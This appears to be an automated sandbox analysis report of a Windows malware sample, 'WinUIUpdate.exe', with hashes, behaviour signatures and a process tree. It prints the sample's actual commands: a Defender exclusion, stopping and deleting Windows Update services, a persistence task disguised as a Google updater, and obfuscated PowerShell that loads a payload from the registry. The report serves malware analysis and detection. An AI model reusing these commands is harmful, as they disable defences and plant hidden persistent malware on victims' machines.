Analysis
-
max time kernel
150s -
max time network
54s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
20-03-2023 09:30
Static task
static1
Behavioral task
behavioral1
Sample
WinUIUpdate.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
WinUIUpdate.exe
Resource
win10v2004-20230221-en
General
-
Target
WinUIUpdate.exe
-
Size
3.7MB
-
MD5
b0a84e4330a9c00c57d3a3e7885f7946
-
SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519
-
SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
-
SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
-
SSDEEP
98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 1556 created 1212 1556 WinUIUpdate.exe 14 PID 1556 created 1212 1556 WinUIUpdate.exe 14 PID 1556 created 1212 1556 WinUIUpdate.exe 14 PID 1556 created 1212 1556 WinUIUpdate.exe 14 PID 1556 created 1212 1556 WinUIUpdate.exe 14 PID 1960 created 420 1960 powershell.EXE 3 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts WinUIUpdate.exe -
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1556 set thread context of 284 1556 WinUIUpdate.exe 51 PID 1960 set thread context of 1600 1960 powershell.EXE 57 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\chromeupdater.exe WinUIUpdate.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 588 sc.exe 1472 sc.exe 1684 sc.exe 940 sc.exe 1536 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1968 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30f78618175bd901 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 840 powershell.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 684 powershell.exe 1556 WinUIUpdate.exe 1556 WinUIUpdate.exe 1960 powershell.EXE 1960 powershell.EXE 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 980 powershell.EXE 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe 1600 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 840 powershell.exe Token: SeShutdownPrivilege 2032 powercfg.exe Token: SeShutdownPrivilege 1792 powercfg.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeShutdownPrivilege 1680 powercfg.exe Token: SeShutdownPrivilege 324 powercfg.exe Token: SeDebugPrivilege 1960 powershell.EXE Token: SeDebugPrivilege 1960 powershell.EXE Token: SeDebugPrivilege 1600 dllhost.exe Token: SeDebugPrivilege 980 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 592 wrote to memory of 2032 592 cmd.exe 37 PID 592 wrote to memory of 2032 592 cmd.exe 37 PID 592 wrote to memory of 2032 592 cmd.exe 37 PID 1924 wrote to memory of 588 1924 cmd.exe 36 PID 1924 wrote to memory of 588 1924 cmd.exe 36 PID 1924 wrote to memory of 588 1924 cmd.exe 36 PID 592 wrote to memory of 1792 592 cmd.exe 38 PID 592 wrote to memory of 1792 592 cmd.exe 38 PID 592 wrote to memory of 1792 592 cmd.exe 38 PID 1924 wrote to memory of 1472 1924 cmd.exe 39 PID 1924 wrote to memory of 1472 1924 cmd.exe 39 PID 1924 wrote to memory of 1472 1924 cmd.exe 39 PID 592 wrote to memory of 1680 592 cmd.exe 40 PID 592 wrote to memory of 1680 592 cmd.exe 40 PID 592 wrote to memory of 1680 592 cmd.exe 40 PID 1924 wrote to memory of 1684 1924 cmd.exe 42 PID 1924 wrote to memory of 1684 1924 cmd.exe 42 PID 1924 wrote to memory of 1684 1924 cmd.exe 42 PID 592 wrote to memory of 324 592 cmd.exe 41 PID 592 wrote to memory of 324 592 cmd.exe 41 PID 592 wrote to memory of 324 592 cmd.exe 41 PID 1924 wrote to memory of 940 1924 cmd.exe 43 PID 1924 wrote to memory of 940 1924 cmd.exe 43 PID 1924 wrote to memory of 940 1924 cmd.exe 43 PID 1924 wrote to memory of 1536 1924 cmd.exe 44 PID 1924 wrote to memory of 1536 1924 cmd.exe 44 PID 1924 wrote to memory of 1536 1924 cmd.exe 44 PID 1924 wrote to memory of 1660 1924 cmd.exe 45 PID 1924 wrote to memory of 1660 1924 cmd.exe 45 PID 1924 wrote to memory of 1660 1924 cmd.exe 45 PID 1924 wrote to memory of 2020 1924 cmd.exe 46 PID 1924 wrote to memory of 2020 1924 cmd.exe 46 PID 1924 wrote to memory of 2020 1924 cmd.exe 46 PID 684 wrote to memory of 1968 684 powershell.exe 47 PID 684 wrote to memory of 1968 684 powershell.exe 47 PID 684 wrote to memory of 1968 684 powershell.exe 47 PID 1924 wrote to memory of 1712 1924 cmd.exe 48 PID 1924 wrote to memory of 1712 1924 cmd.exe 48 PID 1924 wrote to memory of 1712 1924 cmd.exe 48 PID 1924 wrote to memory of 1364 1924 cmd.exe 49 PID 1924 wrote to memory of 1364 1924 cmd.exe 49 PID 1924 wrote to memory of 1364 1924 cmd.exe 49 PID 1924 wrote to memory of 608 1924 cmd.exe 50 PID 1924 wrote to memory of 608 1924 cmd.exe 50 PID 1924 wrote to memory of 608 1924 cmd.exe 50 PID 1556 wrote to memory of 284 1556 WinUIUpdate.exe 51 PID 1528 wrote to memory of 1960 1528 taskeng.exe 53 PID 1528 wrote to memory of 1960 1528 taskeng.exe 53 PID 1528 wrote to memory of 1960 1528 taskeng.exe 53 PID 1528 wrote to memory of 980 1528 taskeng.exe 54 PID 1528 wrote to memory of 980 1528 taskeng.exe 54 PID 1528 wrote to memory of 980 1528 taskeng.exe 54 PID 1528 wrote to memory of 980 1528 taskeng.exe 54 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1960 wrote to memory of 1600 1960 powershell.EXE 57 PID 1600 wrote to memory of 420 1600 dllhost.exe 3 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:480
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1360
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1068
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1128
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1060
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:616
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:848
-
C:\Windows\system32\taskeng.exetaskeng.exe {07E8A0DB-C9A6-4F32-9E9C-A97A4870564B} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+'st'+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+'e'+'rs'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:752
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{25bac9f5-3b25-47e3-b7f1-9a60afbf05f9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:488
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:2012
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1212
-
C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:588
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1472
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:940
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1536
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1660
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2020
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1712
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1364
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineUA /tr "'C:\Program Files\Google\Chrome\chromeupdater.exe'"3⤵
- Creates scheduled task(s)
PID:1968
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:284
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1180
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12154296931903486855-2123541791-18345936142027518471694852113-14938323231640187391"1⤵PID:1108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51dcf42a7b9a0e3702709398ce2eafbcb
SHA16b3e9982c598e289502a0e08a76e7a2f348d445e
SHA256595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0
SHA5125743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5VB74GZ0H1O7UNJ9URXZ.temp
Filesize7KB
MD51dcf42a7b9a0e3702709398ce2eafbcb
SHA16b3e9982c598e289502a0e08a76e7a2f348d445e
SHA256595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0
SHA5125743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500